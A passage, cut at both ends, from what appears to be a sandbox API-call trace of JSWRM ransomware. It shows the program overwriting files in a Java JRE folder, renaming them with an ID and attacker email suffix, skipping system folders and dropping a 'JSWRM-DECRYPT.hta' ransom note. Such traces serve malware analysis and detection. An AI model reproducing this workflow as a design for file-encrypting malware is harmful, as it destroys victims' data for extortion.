lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0070.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javaws.jar", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="javaws.jar", lpUsedDefaultChar=0x0) returned 10 [0070.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0070.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0070.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0070.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0070.668] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javaws.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\javaws.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0070.669] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=944167) returned 1 [0070.669] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0070.669] ReadFile (in: hFile=0x454, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0070.682] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.682] WriteFile (in: hFile=0x454, lpBuffer=0x24d1d8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0070.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0070.682] CloseHandle (hObject=0x454) returned 1 [0070.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0070.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0070.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0070.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0070.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2170f0 [0070.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0070.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0070.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2170f0 | out: hHeap=0x1e0000) returned 1 [0070.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.683] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javaws.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\javaws.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\javaws.jar.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\javaws.jar.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0070.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0070.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0070.684] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1c6de, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="jce.jar", cAlternateFileName="")) returned 1 [0070.684] lstrcmpiW (lpString1="jce.jar", lpString2=".") returned 1 [0070.684] lstrcmpiW (lpString1="jce.jar", lpString2="..") returned 1 [0070.684] lstrcmpiW (lpString1="jce.jar", lpString2="...") returned 1 [0070.684] lstrcmpiW (lpString1="jce.jar", lpString2="windows") returned -1 [0070.684] lstrcmpiW (lpString1="jce.jar", lpString2="recovery") returned -1 [0070.684] lstrcmpiW (lpString1="jce.jar", lpString2="perflogs") returned -1 [0070.684] lstrcmpiW (lpString1="jce.jar", lpString2="documents and settings") returned 1 [0070.684] lstrcmpiW (lpString1="jce.jar", lpString2="$RECYCLE.BIN") returned 1 [0070.684] lstrcmpiW (lpString1="jce.jar", lpString2="system volume information") returned -1 [0070.684] lstrcmpiW (lpString1="jce.jar", lpString2="msocache") returned -1 [0070.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jce.jar", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0070.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jce.jar", cchWideChar=7, lpMultiByteStr=0x345ef40, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jce.jar", lpUsedDefaultChar=0x0) returned 7 [0070.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jce.jar", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0070.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jce.jar", cchWideChar=7, lpMultiByteStr=0x345ef10, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jce.jar", lpUsedDefaultChar=0x0) returned 7 [0070.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0070.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0070.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0070.684] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jce.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jce.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0070.684] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=116446) returned 1 [0070.684] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1c6d0) returned 0x24d1d8 [0070.685] ReadFile (in: hFile=0x454, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x1c6d0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesRead=0x345ec04*=0x1c6d0, lpOverlapped=0x0) returned 1 [0070.693] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.693] WriteFile (in: hFile=0x454, lpBuffer=0x24d1d8*, nNumberOfBytesToWrite=0x1c6d0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesWritten=0x345ec00*=0x1c6d0, lpOverlapped=0x0) returned 1 [0070.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0070.695] CloseHandle (hObject=0x454) returned 1 [0070.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0070.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0070.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0070.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0070.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2170f0 [0070.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0070.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0070.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2170f0 | out: hHeap=0x1e0000) returned 1 [0070.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.695] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jce.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jce.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jce.jar.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jce.jar.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0070.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0070.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0070.696] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa1295634, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="jfr", cAlternateFileName="")) returned 1 [0070.696] lstrcmpiW (lpString1="jfr", lpString2=".") returned 1 [0070.696] lstrcmpiW (lpString1="jfr", lpString2="..") returned 1 [0070.696] lstrcmpiW (lpString1="jfr", lpString2="...") returned 1 [0070.696] lstrcmpiW (lpString1="jfr", lpString2="windows") returned -1 [0070.696] lstrcmpiW (lpString1="jfr", lpString2="recovery") returned -1 [0070.696] lstrcmpiW (lpString1="jfr", lpString2="perflogs") returned -1 [0070.696] lstrcmpiW (lpString1="jfr", lpString2="documents and settings") returned 1 [0070.696] lstrcmpiW (lpString1="jfr", lpString2="$RECYCLE.BIN") returned 1 [0070.696] lstrcmpiW (lpString1="jfr", lpString2="system volume information") returned -1 [0070.696] lstrcmpiW (lpString1="jfr", lpString2="msocache") returned -1 [0070.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0070.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0070.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232db8 [0070.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0070.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217e00 [0070.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0070.696] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr\\jswrm-decrypt.hta")) returned 0xffffffff [0070.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217e00 | out: hHeap=0x1e0000) returned 1 [0070.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0070.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0070.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0070.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0070.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0070.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0070.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217250 [0070.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0070.778] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0070.779] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.779] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0070.780] CloseHandle (hObject=0x454) returned 1 [0070.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217250 | out: hHeap=0x1e0000) returned 1 [0070.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0070.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232db8 | out: hHeap=0x1e0000) returned 1 [0070.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e88 [0070.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0070.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0070.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0070.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217250 [0070.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0070.781] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr\\jswrm-decrypt.hta")) returned 0x20 [0070.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217250 | out: hHeap=0x1e0000) returned 1 [0070.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0070.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0070.781] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa1295634, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x20d87b92, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231d40 [0070.781] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0070.781] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa1295634, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x20d87b92, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0070.781] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0070.781] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0070.781] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4e8d, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="default.jfc", cAlternateFileName="")) returned 1 [0070.781] lstrcmpiW (lpString1="default.jfc", lpString2=".") returned 1 [0070.781] lstrcmpiW (lpString1="default.jfc", lpString2="..") returned 1 [0070.781] lstrcmpiW (lpString1="default.jfc", lpString2="...") returned 1 [0070.781] lstrcmpiW (lpString1="default.jfc", lpString2="windows") returned -1 [0070.781] lstrcmpiW (lpString1="default.jfc", lpString2="recovery") returned -1 [0070.781] lstrcmpiW (lpString1="default.jfc", lpString2="perflogs") returned -1 [0070.781] lstrcmpiW (lpString1="default.jfc", lpString2="documents and settings") returned -1 [0070.781] lstrcmpiW (lpString1="default.jfc", lpString2="$RECYCLE.BIN") returned 1 [0070.782] lstrcmpiW (lpString1="default.jfc", lpString2="system volume information") returned -1 [0070.782] lstrcmpiW (lpString1="default.jfc", lpString2="msocache") returned -1 [0070.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0070.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="default.jfc", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0070.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="default.jfc", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="default.jfc", lpUsedDefaultChar=0x0) returned 11 [0070.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0070.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0070.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="default.jfc", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0070.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="default.jfc", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="default.jfc", lpUsedDefaultChar=0x0) returned 11 [0070.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0070.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0070.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0070.783] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.783] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209350 [0070.783] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\default.jfc" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr\\default.jfc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0070.783] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=20109) returned 1 [0070.783] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4e80) returned 0x24e1e0 [0070.783] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x4e80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0x4e80, lpOverlapped=0x0) returned 1 [0070.786] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.786] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0x4e80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0x4e80, lpOverlapped=0x0) returned 1 [0070.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0070.786] CloseHandle (hObject=0x458) returned 1 [0070.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0070.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, 